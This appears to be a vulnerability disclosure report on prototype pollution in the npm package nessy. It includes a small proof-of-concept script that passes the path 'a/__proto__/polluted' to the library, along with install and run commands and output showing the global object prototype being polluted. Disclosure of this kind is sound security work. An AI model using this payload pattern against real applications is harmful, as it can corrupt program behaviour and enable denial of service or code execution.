Prototype Pollution in coderaiser/nessy
Valid
Reported on
Oct 23rd 2020
Description
nessy
is vulnerable to Prototype Pollution
.
This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.
Proof of Concept
- Create the following PoC file:
// poc.js
var nessy = require("nessy")
var obj = {}
console.log("Before : " + {}.polluted);
nessy('a/__proto__/polluted', "Yes! Its Polluted", '/', obj);
console.log("After : " + {}.polluted);
- Execute the following commands in another terminal:
npm i nessy # Install affected module
node poc.js # Run the PoC
- Check the Output:
Before : undefined
After : Yes! Its Polluted
Occurrences
to join this conversation